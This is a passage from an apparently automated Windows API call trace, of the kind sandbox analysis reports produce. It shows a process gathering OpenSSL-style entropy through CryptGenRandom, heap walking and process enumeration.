(hLibModule=0x745a0000) returned 1 [0128.350] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0128.350] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0128.350] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0128.351] CryptAcquireContextW (in: phProv=0xe00f018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00f018*=0x49d3198) returned 1 [0128.351] CryptGenRandom (in: hProv=0x49d3198, dwLen=0x40, pbBuffer=0xe00f464 | out: pbBuffer=0xe00f464) returned 1 [0128.351] GetCurrentThreadId () returned 0x618 [0128.351] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.351] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.351] CryptReleaseContext (hProv=0x49d3198, dwFlags=0x0) returned 1 [0128.351] CryptAcquireContextW (in: phProv=0xe00f018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0xe00f018*=0x49d3198) returned 0 [0128.352] FreeLibrary (hLibModule=0x77710000) returned 1 [0128.352] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0128.352] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0128.352] GetDesktopWindow () returned 0x10010 [0128.352] GetProcessWindowStation () returned 0x48 [0128.352] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0xe00efa0 | out: pvInfo=0x0, lpnLengthNeeded=0xe00efa0) returned 0 [0128.352] GetLastError () returned 0x7a [0128.352] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0xe00ef80, nLength=0x10, lpnLengthNeeded=0xe00efa0 | out: pvInfo=0xe00ef80, lpnLengthNeeded=0xe00efa0) returned 1 [0128.352] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77130000 [0128.353] GetProcAddress (hModule=0x77130000, lpProcName="GetForegroundWindow") returned 0x77152320 [0128.353] GetProcAddress (hModule=0x77130000, lpProcName="GetCursorInfo") returned 0x771a812f [0128.353] GetProcAddress (hModule=0x77130000, lpProcName="GetQueueStatus") returned 0x77153924 [0128.353] GetForegroundWindow () returned 0x150268 [0128.353] GetCurrentThreadId () returned 0x618 [0128.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.353] GetCursorInfo (in: pci=0xe00f450 | out: pci=0xe00f450) returned 1 [0128.353] GetQueueStatus (flags=0xbf) returned 0x0 [0128.353] GetCurrentThreadId () returned 0x618 [0128.353] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.353] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.353] FreeLibrary (hLibModule=0x77130000) returned 1 [0128.354] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0128.354] GetProcAddress (hModule=0x76d30000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0128.354] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32First") returned 0x76dc5763 [0128.354] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32Next") returned 0x76dc594e [0128.354] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListFirst") returned 0x76dc5621 [0128.355] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListNext") returned 0x76dc56cb [0128.355] GetProcAddress (hModule=0x76d30000, lpProcName="Process32First") returned 0x76d68ae7 [0128.355] GetProcAddress (hModule=0x76d30000, lpProcName="Process32Next") returned 0x76d688a4 [0128.355] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32First") returned 0x76dc5b93 [0128.355] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32Next") returned 0x76dc5c3f [0128.356] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0128.356] GetProcAddress (hModule=0x76d30000, lpProcName="Module32Next") returned 0x76dc5dc2 [0128.356] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x6f0 [0128.369] GetTickCount () returned 0x116f06c [0128.369] Heap32ListFirst (hSnapshot=0x6f0, lphl=0xe00f454) returned 1 [0128.371] GetCurrentThreadId () returned 0x618 [0128.371] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.371] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.371] Heap32First (lphe=0xe00efc0, th32ProcessID=0x34c, th32HeapID=0x4970000) returned 1 [0128.407] GetCurrentThreadId () returned 0x618 [0128.407] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.407] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.407] Heap32Next (lphe=0xe00efc0) returned 1 [0128.512] GetTickCount () returned 0x116f0f8 [0128.512] GetCurrentThreadId () returned 0x618 [0128.512] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.512] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.512] Heap32Next (lphe=0xe00efc0) returned 1 [0128.535] GetTickCount () returned 0x116f117 [0128.535] GetCurrentThreadId () returned 0x618 [0128.536] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.536] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.536] Heap32Next (lphe=0xe00efc0) returned 1 [0128.558] GetTickCount () returned 0x116f127 [0128.558] GetCurrentThreadId () returned 0x618 [0128.558] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.558] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.558] Heap32Next (lphe=0xe00efc0) returned 1 [0128.580] GetTickCount () returned 0x116f137 [0128.580] GetCurrentThreadId () returned 0x618 [0128.580] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.580] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.580] Heap32Next (lphe=0xe00efc0) returned 1 [0128.606] GetTickCount () returned 0x116f156 [0128.606] GetCurrentThreadId () returned 0x618 [0128.606] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.606] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.606] Heap32Next (lphe=0xe00efc0) returned 1 [0128.653] GetTickCount () returned 0x116f185 [0128.653] GetCurrentThreadId () returned 0x618 [0128.654] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.654] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.654] Heap32Next (lphe=0xe00efc0) returned 1 [0128.676] GetTickCount () returned 0x116f1a4 [0128.676] GetCurrentThreadId () returned 0x618 [0128.676] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.676] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.676] Heap32Next (lphe=0xe00efc0) returned 1 [0128.699] GetTickCount () returned 0x116f1b3 [0128.699] GetCurrentThreadId () returned 0x618 [0128.699] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.699] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.699] Heap32Next (lphe=0xe00efc0) returned 1 [0128.723] GetTickCount () returned 0x116f1d3 [0128.723] GetCurrentThreadId () returned 0x618 [0128.723] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.723] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.723] Heap32Next (lphe=0xe00efc0) returned 1 [0128.755] GetTickCount () returned 0x116f1f2 [0128.755] GetCurrentThreadId () returned 0x618 [0128.755] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.755] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.755] Heap32Next (lphe=0xe00efc0) returned 1 [0128.779] GetTickCount () returned 0x116f201 [0128.779] GetCurrentThreadId () returned 0x618 [0128.779] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.779] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.779] Heap32Next (lphe=0xe00efc0) returned 1 [0128.801] GetTickCount () returned 0x116f221 [0128.801] GetCurrentThreadId () returned 0x618 [0128.801] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.801] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.801] Heap32Next (lphe=0xe00efc0) returned 1 [0128.826] GetTickCount () returned 0x116f230 [0128.826] GetCurrentThreadId () returned 0x618 [0128.826] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.827] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.827] Heap32Next (lphe=0xe00efc0) returned 1 [0128.849] GetTickCount () returned 0x116f24f [0128.849] GetCurrentThreadId () returned 0x618 [0128.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.849] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.849] Heap32Next (lphe=0xe00efc0) returned 1 [0128.871] GetTickCount () returned 0x116f25f [0128.871] GetCurrentThreadId () returned 0x618 [0128.871] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.871] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.871] Heap32Next (lphe=0xe00efc0) returned 1 [0128.895] GetTickCount () returned 0x116f27e [0128.895] GetCurrentThreadId () returned 0x618 [0128.895] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.895] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.895] Heap32Next (lphe=0xe00efc0) returned 1 [0128.935] GetTickCount () returned 0x116f29d [0128.935] GetCurrentThreadId () returned 0x618 [0128.935] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.936] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.936] Heap32Next (lphe=0xe00efc0) returned 1 [0128.964] GetTickCount () returned 0x116f2bd [0128.964] GetCurrentThreadId () returned 0x618 [0128.964] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.964] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.964] Heap32Next (lphe=0xe00efc0) returned 1 [0128.992] GetTickCount () returned 0x116f2dc [0128.992] GetCurrentThreadId () returned 0x618 [0128.992] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0128.993] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0128.993] Heap32Next (lphe=0xe00efc0) returned 1 [0129.021] GetTickCount () returned 0x116f2fb [0129.021] GetCurrentThreadId () returned 0x618 [0129.021] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.021] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.021] Heap32Next (lphe=0xe00efc0) returned 1 [0129.051] GetTickCount () returned 0x116f31a [0129.051] GetCurrentThreadId () returned 0x618 [0129.051] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.051] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.051] Heap32Next (lphe=0xe00efc0) returned 1 [0129.080] GetTickCount () returned 0x116f339 [0129.080] GetCurrentThreadId () returned 0x618 [0129.080] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.080] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.080] Heap32Next (lphe=0xe00efc0) returned 1 [0129.109] GetTickCount () returned 0x116f349 [0129.109] GetCurrentThreadId () returned 0x618 [0129.109] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.109] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.109] Heap32Next (lphe=0xe00efc0) returned 1 [0129.137] GetTickCount () returned 0x116f368 [0129.137] GetCurrentThreadId () returned 0x618 [0129.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.137] Heap32Next (lphe=0xe00efc0) returned 1 [0129.167] GetTickCount () returned 0x116f387 [0129.167] GetCurrentThreadId () returned 0x618 [0129.167] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.167] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.167] Heap32Next (lphe=0xe00efc0) returned 1 [0129.196] GetTickCount () returned 0x116f3a7 [0129.196] GetCurrentThreadId () returned 0x618 [0129.196] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.196] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.196] Heap32Next (lphe=0xe00efc0) returned 1 [0129.224] GetTickCount () returned 0x116f3c6 [0129.224] GetCurrentThreadId () returned 0x618 [0129.224] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.224] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.224] Heap32Next (lphe=0xe00efc0) returned 1 [0129.253] GetTickCount () returned 0x116f3e5 [0129.253] GetCurrentThreadId () returned 0x618 [0129.253] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.253] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.253] Heap32Next (lphe=0xe00efc0) returned 1 [0129.282] GetTickCount () returned 0x116f3f5 [0129.282] GetCurrentThreadId () returned 0x618 [0129.282] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.282] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.282] Heap32Next (lphe=0xe00efc0) returned 1 [0129.312] GetTickCount () returned 0x116f414 [0129.312] GetCurrentThreadId () returned 0x618 [0129.313] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.313] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.313] Heap32Next (lphe=0xe00efc0) returned 1 [0129.342] GetTickCount () returned 0x116f433 [0129.342] GetCurrentThreadId () returned 0x618 [0129.342] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.342] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.342] Heap32Next (lphe=0xe00efc0) returned 1 [0129.372] GetTickCount () returned 0x116f452 [0129.372] GetCurrentThreadId () returned 0x618 [0129.372] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.372] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.372] Heap32Next (lphe=0xe00efc0) returned 1 [0129.403] GetTickCount () returned 0x116f471 [0129.403] Heap32ListNext (hSnapshot=0x6f0, lphl=0xe00f454) returned 1 [0129.404] GetTickCount () returned 0x116f471 [0129.404] GetTickCount () returned 0x116f471 [0129.405] Process32First (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.406] GetCurrentThreadId () returned 0x618 [0129.406] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.406] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.406] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0129.407] GetTickCount () returned 0x116f471 [0129.407] GetCurrentThreadId () returned 0x618 [0129.407] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.407] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.407] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0129.434] GetTickCount () returned 0x116f491 [0129.434] GetCurrentThreadId () returned 0x618 [0129.434] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.435] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.435] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.436] GetTickCount () returned 0x116f491 [0129.436] GetCurrentThreadId () returned 0x618 [0129.436] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.436] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.436] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0129.437] GetTickCount () returned 0x116f491 [0129.437] GetCurrentThreadId () returned 0x618 [0129.437] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.437] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.437] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.438] GetTickCount () returned 0x116f491 [0129.438] GetCurrentThreadId () returned 0x618 [0129.438] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.438] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.438] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0129.440] GetTickCount () returned 0x116f4a0 [0129.440] GetCurrentThreadId () returned 0x618 [0129.440] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.440] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.440] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0129.441] GetTickCount () returned 0x116f4a0 [0129.441] GetCurrentThreadId () returned 0x618 [0129.441] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.441] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.441] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0129.442] GetTickCount () returned 0x116f4a0 [0129.442] GetCurrentThreadId () returned 0x618 [0129.442] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.442] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.442] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0129.443] GetTickCount () returned 0x116f4a0 [0129.443] GetCurrentThreadId () returned 0x618 [0129.443] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.443] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.443] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.445] GetTickCount () returned 0x116f4a0 [0129.445] GetCurrentThreadId () returned 0x618 [0129.445] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.445] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.445] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.446] GetTickCount () returned 0x116f4a0 [0129.446] GetCurrentThreadId () returned 0x618 [0129.446] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.446] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.446] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.449] GetTickCount () returned 0x116f4a0 [0129.449] GetCurrentThreadId () returned 0x618 [0129.449] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.449] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.449] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.450] GetTickCount () returned 0x116f4a0 [0129.450] GetCurrentThreadId () returned 0x618 [0129.450] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.450] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.450] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.452] GetTickCount () returned 0x116f4a0 [0129.452] GetCurrentThreadId () returned 0x618 [0129.452] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.452] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.452] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0129.453] GetTickCount () returned 0x116f4a0 [0129.453] GetCurrentThreadId () returned 0x618 [0129.453] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0129.453] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0129.453] Process32Next (in: hSnapshot=0x6f0, lppe=0xe00f258 | out: lppe=0xe00f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.454] GetTickCount () returned 0x116f4b0 [0129.454] GetCurrentThreadId () returned 0x618 